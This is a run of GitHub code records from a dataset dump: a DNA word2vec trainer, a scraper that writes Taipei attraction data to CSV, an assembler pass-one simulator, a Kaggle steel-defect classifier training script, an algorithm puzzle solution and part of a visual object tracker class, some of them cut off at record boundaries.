training_df['seq'].values.tolist()\n training_datasize = len(training_seq) # count how many sequence\n for i in range(0, training_datasize): # cut a whole sequence in to words\n if 'N' in training_seq[i]:\n training_seq[i] = training_seq[i].replace('N','')\n training_seq[i] = re.findall(r'\\w{5}', str(training_seq[i]))\n return training_seq\n\n# define a dictionary\nclass Separate:\n def __init__(self, kmer_number):\n self.kmer = kmer_number\n\n def build_dict(self):\n alfa = ['A', 'G', 'C', 'T']\n keywords = list(it.product(alfa, repeat=self.kmer)) # generate all the possibility words\n keywords = sorted(keywords)\n s = ''\n all_possibility = []\n for i in range(len(keywords)):\n all_possibility.append(s.join(keywords[i])) # form a list to store all words\n #print(all_possibility)\n vocab, index = {}, 1 # define dictionary\n vocab[''] = 0 # the first word is \n vocab_size = len(all_possibility) # define the size of the dictionary\n for kmer in all_possibility:\n vocab[kmer] = index # assign value to dictionary\n index += 1\n inverse_vocab = {index: kemer for kemer, index in vocab.items()} # define a inverse_dictionary\n #print(inverse_vocab)\n return vocab, inverse_vocab, vocab_size\n\n\n# define center words and context words\nclass def_context():\n def __init__(self,sentence,window):\n self.sentence = sentence # read a sentence\n self.window = window # define a window size\n\n def extract_word(self):\n count = 0 # for reduce the size of dataset\n self.context = [] # pre-define the context\n self.label = [] # pre-define the center word\n for sentence in self.sentence: # read a sentence\n #print('Runing', sentence)\n count += 1\n if count > 50000:\n print('The dataset is too large.')\n break\n for idx, word in enumerate(sentence): # read each word\n # if idx >= self.window and idx <= len(sentence)-self.window-1:\n self.label.append([sentence[idx]]) # This is the center word, aka, each word of a sentence\n small = []\n index = list(range(max(0, idx - self.window), min(len(sentence), idx + 1 + self.window))) # Context idx range\n index.remove(idx) # context remove the center word\n if idx - self.window < 0:\n for m in range(abs(idx - self.window)):\n small.append('')\n small_DNA=[sentence[i] for i in index]\n #print('D', small_DNA[0])\n for kk in range(len(small_DNA)):\n small.append(small_DNA[kk])\n self.context.append(small)\n\n if idx + 1 + self.window-len(sentence) > 0:\n small_DNA=[sentence[i] for i in index]\n #print('D', small_DNA[0])\n for kk in range(len(small_DNA)):\n small.append(small_DNA[kk])\n for m in range(abs(idx + 1 + self.window-len(sentence))):\n small.append('')\n self.context.append(small)\n\n if idx - self.window >= 0 and idx + 1 + self.window-len(sentence) <= 0:\n self.context.append([sentence[i] for i in index]) # store the context in a list\n # self.context.append([sentence[i] for i in range(idx-self.window, min(idx+self.window+1)) if i !=idx])\n\n #print(\"Context :\", self.context , \"Target :\", self.label)\n #print(\"Target :\", self.label)\n return self.context, self.label\n\n\n# Construct a data loader\nclass dataloader():\n def __init__(self, vocab, context, label, vocab_size):\n self.vocab = vocab # load the dictionary\n self.context = context # load the context\n self.label = label # load the center word (label)\n self.vocab_size = vocab_size # load the size of words\n\n def __len__(self):\n return len(self.context) # return the size of a batch data\n\n def __getitem__(self, idx): # for each batch\n self.onehot = np.zeros(self.vocab_size+1, dtype=np.float32) # using one-hot encoding to encode label\n context = [self.vocab[word] for word in self.context[idx]] # using dictionary to find the context words\n label = [self.vocab[word] for word in self.label[idx]] # using dictionary to find the center word\n id = self.vocab[self.label[idx][0]] # for each batch, find the center word\n self.onehot[int(str(id))] = 1 # set the one-hot to 1\n #context = context + [0]*(4 - len(context)) # if the size of context word is less than 4,using 0 to fill\n return np.array(context, dtype=np.int), self.onehot\n\n\n# network structure#snp\nclass Word2Vec(nn.Module):\n def __init__(self, vocab_size, embedding_dim, context_size):\n super(Word2Vec, self).__init__()\n vocab_size += 1 # first word \n self.embeddings = nn.Embedding(vocab_size, embedding_dim) # Embedding layer\n self.linear1 = nn.Linear(context_size * embedding_dim, 1024) # 1 hidden layer\n self.linear2 = nn.Linear(1024, vocab_size) # output layer Cbow\n\n def forward(self, inputs):\n embeds = self.embeddings(inputs).view(len(inputs), -1)\n out = F.relu(self.linear1(embeds))\n out = self.linear2(out)\n log_probs = F.log_softmax(out, dim=1)\n return (log_probs)\n\ndef run_code_for_training(net, epochs):\n loss_tally = []\n net = net.to(device)\n criterion = torch.nn.NLLLoss()\n optimizer = torch.optim.Adam(net.parameters(), lr=1e-4)\n start_time = time.perf_counter()\n for epoch in range(epochs):\n running_loss = 0.0\n for i, data in enumerate(train_data_loader):\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, torch.max(labels, 1)[1])\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n if (i + 1) % 500 == 0:\n current_time = time.perf_counter()\n elapsed_time = current_time - start_time\n print(\"\\n[epoch:%d, batch:%5d, elapsed_time=%5d secs] loss: %.3f\" %\n (epoch + 1, i + 1, elapsed_time, running_loss / float(500)))\n loss_tally.append(running_loss / float(500))\n running_loss = 0.0\n torch.save(net.state_dict(), 'net_word2vec.pth') #origin net1\n return loss_tally\n\n\nif __name__ == '__main__':\n print(torch.__version__)\n print(torch.cuda.is_available())\n kmer_number = 5\n data = read_input()\n cut = Separate(kmer_number)\n dicts, inverse_vocab, vocab_size = cut.build_dict()\n context_length = 8\n test = def_context(data, context_length)\n context, label = test.extract_word()\n print(len(context))\n print(\"Data size\", len(label))\n\n train_dataset = dataloader(dicts, context, label, vocab_size)\n train_data_loader = torch.utils.data.DataLoader(dataset = train_dataset,\n batch_size=500,\n shuffle=True,\n num_workers=0)\n\n model_1 = Word2Vec(vocab_size, 768, 2*context_length) # model (how many words, embedding size, window size)\n loss_1 = run_code_for_training(model_1, 10) # training\n\n","repo_name":"lu876/BERT-methylation","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3393360080","text":"import urllib.request as request\nimport json\nsrc=\"https://padax.github.io/taipei-day-trip-resources/taipei-attractions-assignment.json\"\nwith request.urlopen(src) as response:\n data=json.load(response)\nclist=data[\"result\"][\"results\"]\nwith open (\"data.csv\",\"w\",encoding=\"utf-8\")as file:\n for att in clist:\n attfile=att[\"file\"]\n attfile_split=attfile.split(\"https\")\n addr=att[\"address\"][5:8]\n attfile1=attfile_split\n file.write(att[\"stitle\"]+\",\"+addr+\",\"+att[\"longitude\"]+\",\"+att[\"latitude\"]+\",\"+\"https\"+attfile1[1]+\"\\n\")\n \n ","repo_name":"pingdori/wehelp-assignments","sub_path":"week3/week-3.py","file_name":"week-3.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35882789945","text":"\nclass literal:\n def __init__(self,lit,address):\n self.lit=lit\n self.address=address\n self.used=False\n\nclass symbol:\n def __init__(self,sym,address):\n self.sym=sym\n self.address=address\n\nclass instruction:\n def __init__(self,name,type,machinecode,weight):\n self.name=name\n self.weight=weight\n self.machineCode=machinecode\n self.type=type\n\nclass inputInstruction(instruction):\n register=\"\"\n memory=\"\"\n locationCounter=0\n optab = open(\"optab.txt\", 'r')\n global instructionList\n def __init__(self,name,register,memory,locationCounter):\n self.name=name\n self.register=register\n self.memory=memory\n self.locationCounter=locationCounter\n\n #instruction parameters\n for _instruction in instructionList:\n if _instruction.name==self.name:\n self.type=_instruction.type\n self.weight=_instruction.weight\n self.machineCode=_instruction.machineCode\n\n\ndef loadTableOptab(instructionList):\n optabInstructionList=[]\n for _instruction in instructionList:\n myInstr=instruction(_instruction[0],_instruction[1],_instruction[2][0],_instruction[2][1])\n optabInstructionList.append(myInstr)\n return optabInstructionList\n\ndef parseInstructions(optab): #optab in readbale form\n instructionList=[]\n for line in optab:\n instruction=line.split()\n if len(instruction)>2:\n instruction[2]=instruction[2].strip('(')\n instruction[2] = instruction[2].strip(')')\n instruction[2]=instruction[2].split(',')\n instructionList.append(instruction)\n return (instructionList)\n\ndef getIndexOfOpcode(ele): #index of opcode from instruction\n global instructionList\n for _instruction in instructionList:\n for i in range(len(ele)):\n if ele[i]==_instruction.name:\n return i\n return -1\n\ndef getInstructionType(opcode):\n global instructionList\n for _instruction in instructionList:\n if _instruction.name==opcode:\n return _instruction.type\n return \"\"\n\ndef getRegister(ele,index):\n type=getInstructionType(ele[index])\n\n if type==\"IS\":\n return ele[1]\n return \"\"\n\ndef getMemory(ele,index):\n type=getInstructionType(ele[index])\n if type==\"IS\":\n return ele[2]\n elif type==\"AD\":\n if ele[index]==\"LTORG\":\n return \"\"\n return ele[index+1]\n\n\n\ndef loadTableInput(inputInstructionsTable):\n inputInstructionClass=[]\n for ele in inputInstructionsTable:\n name=\"\"\n register=\"\"\n memory=\"\"\n index=getIndexOfOpcode(ele)\n name=ele[index]\n register=getRegister(ele,index)\n memory=getMemory(ele,index)\n\ndef getWeight(opcode):\n global instructionList\n\n if opcode==\"END\":\n return '1'\n for ele in instructionList:\n if ele.name==opcode:\n return ele.weight\n\ndef classUp(inputInstructionsTable):\n global locationCounter\n global literalTable\n global symbolTable\n\n increment=0\n inputInstructionClassList=[]\n currentLiterals=[] #only literal values\n previnst=''\n\n for row in inputInstructionsTable:\n opcode=getIndexOfOpcode(row)\n opcode=row[opcode]\n type=getInstructionType(opcode)\n\n if type=='IS':\n increment+=1\n try:\n register=row[1]\n except:\n register=\"\"\n\n try:\n memory=row[2]\n except:\n memory=\"\"\n\n try:\n if memory[0][0]=='=':\n currentLiterals.append(memory[0])\n except:\n pass\n\n elif type=='AD':\n if opcode=='LTORG' or opcode=='END':\n #push literals\n for lit in currentLiterals:\n literalTable.append(literal(lit,locationCounter))\n locationCounter+=1\n currentLiterals=[]\n register=\"\"\n try:\n memory=row[1]\n except:\n memory=\"\"\n\n elif type=='DL':\n if opcode=='DC':\n symbolTable.append(symbol(row[0],locationCounter))\n locationCounter+=1\n elif opcode=='DS':\n symbolTable.append(symbol(row[0], locationCounter))\n locationCounter+=int(row[2][0])\n register=row[0]\n memory=row[2]\n\n if opcode=='START':\n inputInstructionClassList.append(inputInstruction(opcode, register.strip(','), memory, locationCounter))\n locationCounter=int(memory)\n else:\n inputInstructionClassList.append(inputInstruction(opcode,register.strip(','),memory,locationCounter))\n locationCounter+=increment\n increment=0\n\n return inputInstructionClassList\n\ndef getRegisterindex(reg):\n global registerList\n #print(\"reglist=\",reg)\n for i in range(len(registerList)):\n if reg==registerList[i]:\n return i+1\n return 0\n\ndef getMemoryType(instruction):\n memory=instruction.memory\n if len(memory)==0:\n return ''\n memory=memory[0]\n if('=' in memory):\n return 'L'\n elif instruction.type=='DL' or memory.isdigit():\n return 'C'\n elif len(memory)!=0:\n return 'S'\n\ndef fourthCol(instruction,memorytype):\n global literalTable\n global symbolTable\n if memorytype=='C':\n temp= instruction.memory#[0].strip('(')\n if type(temp) is not str:\n temp=temp[0].strip('(')\n temp=temp.strip(')')\n temp.strip(')')\n return temp\n if memorytype=='L':\n #print(\"memory= \", instruction.memory[0])\n index=0\n for lit in literalTable:\n print(\"lit.lit= {} inst.mem= {}\".format(lit.lit,instruction.memory[0]))\n if lit.lit==instruction.memory[0] and lit.used==False:\n\n lit.used=True\n return index+1\n else:\n index+=1\n return -9\n if memorytype=='S':\n index=0\n for symbol in symbolTable:\n if symbol.sym==instruction.memory[0]:\n return index+1\n else:\n index+=1\n\ndef writeToFile(file):\n global inputInstructionsTable\n global instructionList\n global symbolTable\n global literalTable\n global registerList\n\n file.write(\"\\n\")\n file.write(\"intermediate code \\n\")\n for _instruction in inputInstructionsTable:\n insType=_instruction.type\n insMXCode=_instruction.machineCode\n insRegisterIndex=getRegisterindex(_instruction.register)\n memoryType = getMemoryType(_instruction)\n insFourth=fourthCol(_instruction, memoryType)\n\n file.write('('+insType+','+insMXCode+')') #6\n if(insRegisterIndex>0):\n file.write('\\t('+str(insRegisterIndex)+')\\t') #11\n else:\n file.write(' ')\n\n if len(memoryType)!=0:\n file.write('(' + memoryType + ',' + str(insFourth) + ')') #5\n else:\n file.write(\" \")\n\n file.write('\\t\\t'+str(_instruction.locationCounter))\n\n file.write('\\n')\n\n file.write(\"\\n\\n\\n\")\n file.write(\"Symbol Table\\n\")\n index=1\n for symbol in symbolTable:\n file.write('{}\\t{}\\t{}'.format(index,symbol.sym,symbol.address))\n file.write('\\n')\n index+=1\n\n file.write(\"\\n\\n\\n\")\n file.write(\"Literal Table\\n\")\n index=1\n for literal in literalTable:\n file.write('{}\\t{}\\t{}'.format(index,literal.lit,literal.address))\n file.write('\\n')\n index+=1\n\n\nlocationCounter=0\nliteralTable=[]\nsymbolTable=[]\n\noptab=open(\"optab.txt\",'r')\nip=open(\"code1.txt\",'r')\n\nregisterList=['AREG','BREG','CREG','DREG']\n\ninstructionList=loadTableOptab(parseInstructions(optab)) #array of classes of optab\ninputInstructionsTable=parseInstructions(ip) #array of instructions of input code\ninputInstructionsTable=classUp(inputInstructionsTable)\n#for ele in inputInstructionsTable:\n # print(ele.type,ele.name,ele.register,ele.memory,ele.locationCounter)\n\nfor ele in inputInstructionsTable:\n print(ele.type,ele.name,ele.register,ele.memory,end=\"\\t\\t\\t\")\n #if(ele.type!=\"AD\"):\n print(ele.locationCounter,ele.weight,end=\"\")\n print()\n\n\nprint(\"literals: \")\nfor ele in literalTable:\n print(ele.lit,ele.address)\n\n\nprint(\"------------\")\nprint(\"symbol table: \")\nfor ele in symbolTable:\n print(ele.sym,ele.address)\n\nprint(\"------\")\ncodeop=open(\"codeop.txt\",'w')\nwriteToFile(codeop)\n","repo_name":"anonymous-baaka/System-Software-lab","sub_path":"expt2/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72956417655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom timeit import default_timer as timer\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler\nimport torch.utils.data as data\nimport torchvision.models as models\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport torch\n\nfrom heng_s_utility_functions import *\nfrom heng_s_models_all import *\n\nPI = np.pi\nIMAGE_RGB_MEAN = [0.485, 0.456, 0.406]\nIMAGE_RGB_STD = [0.229, 0.224, 0.225]\nDEFECT_COLOR = [(0,0,0),(0,0,255),(0,255,0),(255,0,0),(0,255,255)]\n\n\n\n\nSPLIT_DIR = '../input/hengs-split'\nDATA_DIR = '../input/severstal-steel-defect-detection'\n\n\n\n\nclass Net(nn.Module):\n def load_pretrain(self, skip, is_print=True):\n conversion=copy.copy(CONVERSION)\n for i in range(0,len(conversion)-8,4):\n conversion[i] = 'block.' + conversion[i][5:]\n load_pretrain(self, skip, pretrain_file=PRETRAIN_FILE, conversion=conversion, is_print=is_print)\n\n def __init__(self, num_class=4, drop_connect_rate=0.2):\n super(Net, self).__init__()\n\n e = ResNet34()\n self.block = nn.ModuleList([\n e.block0,\n e.block1,\n e.block2,\n e.block3,\n e.block4,\n ])\n e = None #dropped\n self.feature = nn.Conv2d(512,32, kernel_size=1) #dummy conv for dim reduction\n self.logit = nn.Conv2d(32,num_class, kernel_size=1)\n\n def forward(self, x):\n batch_size,C,H,W = x.shape\n\n for i in range( len(self.block)):\n x = self.block[i](x)\n #print(i, x.shape)\n\n x = F.dropout(x,0.5,training=self.training)\n x = F.adaptive_avg_pool2d(x, 1)\n x = self.feature(x)\n logit = self.logit(x)\n return logit\n\n\n\n\n# Class which is used by the infor object in __get_item__\nclass Struct(object):\n def __init__(self, is_copy=False, **kwargs):\n self.add(is_copy, **kwargs)\n\n def add(self, is_copy=False, **kwargs):\n #self.__dict__.update(kwargs)\n\n if is_copy == False:\n for key, value in kwargs.items():\n setattr(self, key, value)\n else:\n for key, value in kwargs.items():\n try:\n setattr(self, key, copy.deepcopy(value))\n #setattr(self, key, value.copy())\n except Exception:\n setattr(self, key, value)\n\n def __str__(self):\n text =''\n for k,v in self.__dict__.items():\n text += '\\t%s : %s\\n'%(k, str(v))\n return text\n\n# Creating masks\ndef run_length_decode(rle, height=256, width=1600, fill_value=1):\n mask = np.zeros((height,width), np.float32)\n if rle != '':\n mask=mask.reshape(-1)\n r = [int(r) for r in rle.split(' ')]\n r = np.array(r).reshape(-1, 2)\n for start,length in r:\n start = start-1 #???? 0 or 1 index ???\n mask[start:(start + length)] = fill_value\n mask=mask.reshape(width, height).T\n return mask\n\n# Collations\ndef null_collate(batch):\n batch_size = len(batch)\n\n input = []\n truth_mask = []\n truth_label = []\n infor = []\n for b in range(batch_size):\n input.append(batch[b][0])\n truth_mask.append(batch[b][1])\n infor.append(batch[b][2])\n\n label = (batch[b][1].reshape(4,-1).sum(1)>8).astype(np.int32)\n truth_label.append(label)\n\n\n input = np.stack(input)\n input = image_to_input(input, IMAGE_RGB_MEAN,IMAGE_RGB_STD)\n input = torch.from_numpy(input).float()\n\n truth_mask = np.stack(truth_mask)\n truth_mask = (truth_mask>0.5).astype(np.float32)\n truth_mask = torch.from_numpy(truth_mask).float()\n\n truth_label = np.array(truth_label)\n truth_label = torch.from_numpy(truth_label).float()\n\n return input, truth_mask, truth_label, infor\n\n# Metric\ndef metric_hit(logit, truth, threshold=0.5):\n batch_size,num_class, H,W = logit.shape\n\n with torch.no_grad():\n logit = logit.view(batch_size,num_class,-1)\n truth = truth.view(batch_size,num_class,-1)\n\n probability = torch.sigmoid(logit)\n p = (probability>threshold).float()\n t = (truth>0.5).float()\n\n tp = ((p + t) == 2).float() # True positives\n tn = ((p + t) == 0).float() # True negatives\n\n tp = tp.sum(dim=[0,2])\n tn = tn.sum(dim=[0,2])\n num_pos = t.sum(dim=[0,2])\n num_neg = batch_size*H*W - num_pos\n\n tp = tp.data.cpu().numpy()\n tn = tn.data.cpu().numpy().sum()\n num_pos = num_pos.data.cpu().numpy()\n num_neg = num_neg.data.cpu().numpy().sum()\n\n tp = np.nan_to_num(tp/(num_pos+1e-12),0)\n tn = np.nan_to_num(tn/(num_neg+1e-12),0)\n\n tp = list(tp)\n num_pos = list(num_pos)\n\n return tn,tp, num_neg,num_pos\n\n# Loss\ndef criterion(logit, truth, weight=None):\n batch_size,num_class, H,W = logit.shape\n logit = logit.view(batch_size,num_class)\n truth = truth.view(batch_size,num_class)\n assert(logit.shape==truth.shape)\n\n loss = F.binary_cross_entropy_with_logits(logit, truth, reduction='none')\n\n if weight is None:\n loss = loss.mean()\n\n else:\n pos = (truth>0.5).float()\n neg = (truth<0.5).float()\n pos_sum = pos.sum().item() + 1e-12\n neg_sum = neg.sum().item() + 1e-12\n loss = (weight[1]*pos*loss/pos_sum + weight[0]*neg*loss/neg_sum).sum()\n #raise NotImplementedError\n\n return loss\n\n# Learning Rate Adjustments\ndef adjust_learning_rate(optimizer, lr):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef get_learning_rate(optimizer):\n lr=[]\n for param_group in optimizer.param_groups:\n lr +=[ param_group['lr'] ]\n\n assert(len(lr)==1) #we support only one param_group\n lr = lr[0]\n return lr\n\n# Learning Rate Schedule\nclass NullScheduler():\n def __init__(self, lr=0.01 ):\n super(NullScheduler, self).__init__()\n self.lr = lr\n self.cycle = 0\n\n def __call__(self, time):\n return self.lr\n\n def __str__(self):\n string = 'NullScheduler\\n' + 'lr=%0.5f '%(self.lr)\n return string\n\n\n\n\nschduler = NullScheduler(lr=0.001)\nbatch_size = 4 #8\niter_accum = 8\n\n\n\n\nclass SteelDataset(Dataset):\n def __init__(self, split, csv, mode, augment=None):\n# import pdb; pdb.set_trace()\n self.split = split\n self.csv = csv\n self.mode = mode\n self.augment = augment\n\n self.uid = list(np.concatenate([np.load(SPLIT_DIR + '/%s'%f , allow_pickle=True) for f in split]))\n df = pd.concat([pd.read_csv(DATA_DIR + '/%s'%f) for f in csv])\n df.fillna('', inplace=True)\n df['Class'] = df['ImageId_ClassId'].str[-1].astype(np.int32)\n df['Label'] = (df['EncodedPixels']!='').astype(np.int32)\n df = df_loc_by_list(df, 'ImageId_ClassId', [ u.split('/')[-1] + '_%d'%c for u in self.uid for c in [1,2,3,4] ])\n self.df = df\n\n def __str__(self):\n num1 = (self.df['Class']==1).sum()\n num2 = (self.df['Class']==2).sum()\n num3 = (self.df['Class']==3).sum()\n num4 = (self.df['Class']==4).sum()\n pos1 = ((self.df['Class']==1) & (self.df['Label']==1)).sum()\n pos2 = ((self.df['Class']==2) & (self.df['Label']==1)).sum()\n pos3 = ((self.df['Class']==3) & (self.df['Label']==1)).sum()\n pos4 = ((self.df['Class']==4) & (self.df['Label']==1)).sum()\n\n length = len(self)\n num = len(self)*4\n pos = (self.df['Label']==1).sum()\n neg = num-pos\n\n #---\n\n string = ''\n string += '\\tmode = %s\\n'%self.mode\n string += '\\tsplit = %s\\n'%self.split\n string += '\\tcsv = %s\\n'%str(self.csv)\n string += '\\t\\tlen = %5d\\n'%len(self)\n if self.mode == 'train':\n string += '\\t\\tnum = %5d\\n'%num\n string += '\\t\\tneg = %5d %0.3f\\n'%(neg,neg/num)\n string += '\\t\\tpos = %5d %0.3f\\n'%(pos,pos/num)\n string += '\\t\\tpos1 = %5d %0.3f %0.3f\\n'%(pos1,pos1/length,pos1/pos)\n string += '\\t\\tpos2 = %5d %0.3f %0.3f\\n'%(pos2,pos2/length,pos2/pos)\n string += '\\t\\tpos3 = %5d %0.3f %0.3f\\n'%(pos3,pos3/length,pos3/pos)\n string += '\\t\\tpos4 = %5d %0.3f %0.3f\\n'%(pos4,pos4/length,pos4/pos)\n return string\n\n\n def __len__(self):\n return len(self.uid)\n\n\n def __getitem__(self, index):\n # print(index)\n folder, image_id = self.uid[index].split('/')\n\n rle = [\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_1','EncodedPixels'].values[0],\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_2','EncodedPixels'].values[0],\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_3','EncodedPixels'].values[0],\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_4','EncodedPixels'].values[0],\n ]\n image = cv2.imread(DATA_DIR + '/%s/%s'%(folder,image_id), cv2.IMREAD_COLOR)\n mask = np.array([run_length_decode(r, height=256, width=1600, fill_value=1) for r in rle])\n\n infor = Struct(\n index = index,\n folder = folder,\n image_id = image_id,\n )\n\n if self.augment is None:\n return image, mask, infor\n else:\n return self.augment(image, mask, infor)\n\n\n\n\ndef do_valid(net, valid_loader, displays=None):\n valid_num = np.zeros(6, np.float32)\n valid_loss = np.zeros(6, np.float32)\n \n for t, (input, truth_mask, truth_label, infor) in enumerate(valid_loader):\n\n #if b==5: break\n net.eval()\n input = input.cuda()\n truth_mask = truth_mask.cuda()\n truth_label = truth_label.cuda()\n\n with torch.no_grad():\n logit = net(input) #data_parallel(net, input)\n loss = criterion(logit, truth_label)\n tn,tp, num_neg,num_pos = metric_hit(logit, truth_label)\n\n\n #zz=0\n #---\n batch_size = len(infor)\n l = np.array([ loss.item(), tn,*tp])\n n = np.array([ batch_size, num_neg,*num_pos])\n valid_loss += l*n\n valid_num += n\n\n #debug-----------------------------\n if displays is not None:\n probability = torch.sigmoid(logit)\n image = input_to_image(input, IMAGE_RGB_MEAN,IMAGE_RGB_STD)\n\n probability_label = probability.data.cpu().numpy()\n truth_label = truth_label.data.cpu().numpy()\n truth_mask = truth_mask.data.cpu().numpy()\n\n for b in range(0, batch_size, 4):\n image_id = infor[b].image_id[:-4]\n result = draw_predict_result_label(image[b], truth_mask[b], truth_label[b], probability_label[b], stack='vertical')\n draw_shadow_text(result,'%05d %s.jpg'%(valid_num[0]-batch_size+b, image_id),(5,24),0.75,[255,255,255],1)\n image_show('result',result,resize=1)\n# cv2.imwrite(out_dir +'/valid/%s.png'%(image_id), result)\n# cv2.waitKey(1)\n pass\n #debug-----------------------------\n\n #print(valid_loss)\n print('\\r %8d /%8d'%(valid_num[0], len(valid_loader.dataset)),end='',flush=True)\n\n pass #-- end of one data loader --\n assert(valid_num[0] == len(valid_loader.dataset))\n valid_loss = valid_loss/valid_num\n\n return valid_loss\n\n\n\n\ndef run_train():\n batch_size = 4\n \n initial_checkpoint = '/root/share/project/kaggle/2019/steel/result1/resnet34-cls-full-foldb0-0/checkpoint/00007500_model.pth'\n \n train_dataset = SteelDataset(\n mode = 'train',\n csv = ['train.csv',],\n split = ['train_b1_11568.npy',],\n augment = train_augment,\n )\n train_loader = DataLoader(\n train_dataset,\n #sampler = BalanceClassSampler(train_dataset, 3*len(train_dataset)),\n #sampler = SequentialSampler(train_dataset),\n sampler = RandomSampler(train_dataset),\n batch_size = batch_size,\n drop_last = True,\n num_workers = 2,\n pin_memory = True,\n collate_fn = null_collate\n )\n\n valid_dataset = SteelDataset(\n mode = 'train',\n csv = ['train.csv',],\n split = ['valid_b1_1000.npy',],\n augment = valid_augment,\n )\n valid_loader = DataLoader(\n valid_dataset,\n sampler = SequentialSampler(valid_dataset),\n #sampler = RandomSampler(valid_dataset),\n batch_size = 4,\n drop_last = False,\n num_workers = 2,\n pin_memory = True,\n collate_fn = null_collate\n )\n \n assert(len(train_dataset)>=batch_size)\n \n net = Net().cuda()\n \n# if initial_checkpoint is not None:\n# state_dict = torch.load(initial_checkpoint, map_location=lambda storage, loc: storage)\n# #for k in ['logit.weight','logit.bias']: state_dict.pop(k, None)\n\n# net.load_state_dict(state_dict,strict=False)\n# else:\n# load_pretrain(net.e, skip=['logit'], is_print=False)\n \n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, net.parameters()), lr=schduler(0), momentum=0.9, weight_decay=0.0001)\n\n num_iters = 3000*1000\n iter_smooth = 50\n iter_log = 500\n iter_valid = 1500\n iter_save = [0, num_iters-1] + list(range(0, num_iters, 1500))#1*1000\n\n start_iter = 0\n start_epoch= 0\n rate = 0\n if initial_checkpoint is not None:\n initial_optimizer = initial_checkpoint.replace('_model.pth','_optimizer.pth')\n if os.path.exists(initial_optimizer):\n checkpoint = torch.load(initial_optimizer)\n start_iter = checkpoint['iter' ]\n start_epoch = checkpoint['epoch']\n #optimizer.load_state_dict(checkpoint['optimizer'])\n pass\n \n train_loss = np.zeros(20,np.float32)\n valid_loss = np.zeros(20,np.float32)\n batch_loss = np.zeros(20,np.float32)\n iter = 0\n i = 0\n \n start = timer()\n# import pdb; pdb.set_trace()\n while iter=B:\n ans = min(ans,sum-B) \n return\n for i in range(idx,N):\n if selected[i]:\n continue\n selected[i] = True\n comb(i,n-1)\n selected[i] = False\n\nT = int(input())\nfor tc in range(1,T+1):\n ans = 9999999\n N,B = list(map(int,input().split()))\n heights = list(map(int,input().split()))\n selected = [False for i in range(N)]\n for n in range(1,N+1):\n comb(0,n)\n print(f'#{tc} {ans}')","repo_name":"hyunwoojeong123/Algorithm","sub_path":"SWEA/D4_1486_HighShelves.py","file_name":"D4_1486_HighShelves.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"25570809536","text":"import torch\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom base_tracker import BaseTracker\nfrom .aaa_util import (\n FeatureExtractor,\n ShortestPathTracker,\n WAADelayed,\n AnchorDetector,\n calc_overlap,\n)\n\n\nclass AAA(BaseTracker):\n def __init__(\n self, n_experts, mode=\"SuperFast\", threshold=0.0,\n ):\n super(AAA, self).__init__(\n f\"AAA/{mode}/{threshold:.2f}\" if threshold > 0 else f\"WithoutDelay/{mode}\"\n )\n\n # The number of experts\n self.n_experts = n_experts\n\n # Anchor extractor\n self.detector = AnchorDetector(threshold=threshold)\n\n # Feature extractor\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n self.extractor = FeatureExtractor(device)\n\n # Offline tracker\n self.offline = ShortestPathTracker()\n\n # If offline tracker is reset\n self.reset_offline = True\n\n # Online learner\n self.learner = WAADelayed()\n\n def initialize(self, image_file, box):\n image = Image.open(image_file).convert(\"RGB\")\n\n # Previous boxes of experts\n self.prev_boxes = []\n\n # Extract target image\n self.target_feature = self.extractor.extract(image, [box])\n\n # Init detector with target feature\n self.detector.init(self.target_feature)\n\n # Init offline tracker with target feature\n self.offline.initialize(box, self.target_feature)\n\n # Init online learner\n self.learner.init(self.n_experts)\n\n def track(self, image_file, boxes):\n image = Image.open(image_file).convert(\"RGB\")\n\n # Save box of experts\n self.prev_boxes.append(boxes)\n\n # Extract features from boxes\n features = self.extractor.extract(image, boxes)\n\n # Detect if it is anchor frame\n detected, feature_scores = self.detector.detect(features)\n anchor = len(detected) > 0\n\n # If it is anchor frame,\n if anchor:\n # Add only boxes whose score is over than threshold to offline tracker\n self.offline.track(\n boxes, features, feature_scores\n )\n\n # Caluclate optimal path\n path = self.offline.run(detected)\n\n # Get the last box's id\n final_box_id = path[-1][1]\n\n # Change to ndarray\n self.prev_boxes = np.stack(self.prev_boxes)\n\n if self.reset_offline:\n # Reset offline tracker\n self.offline.initialize(boxes[final_box_id], features[final_box_id])\n\n # Get offline tracking results\n offline_results = np.array(\n [self.prev_boxes[frame, ind[1]] for frame, ind in enumerate(path)]\n )\n\n else:\n offline_results = np.array(\n [self.prev_boxes[frame, ind[1]] for frame, ind in enumerate(path[-len(self.prev_boxes):])]\n )\n\n # Calc losses of experts\n gradient_losses = self._calc_expert_losses(offline_results)\n\n # Clean previous boxes\n self.prev_boxes = []\n\n # Update weight of experts\n self.learner.update(gradient_losses)\n\n # Return last box of offline results\n predict = boxes[final_box_id]\n\n # Otherwise\n else:\n # Add all boxes to offline tracker\n self.offline.track(boxes, features, feature_scores)\n\n # No offline result here\n offline_results = None\n\n # Return box with aggrogating experts' box\n predict = random.choices(boxes, weights=self.learner.w)[0]\n\n return predict, offline_results, self.learner.w\n\n def 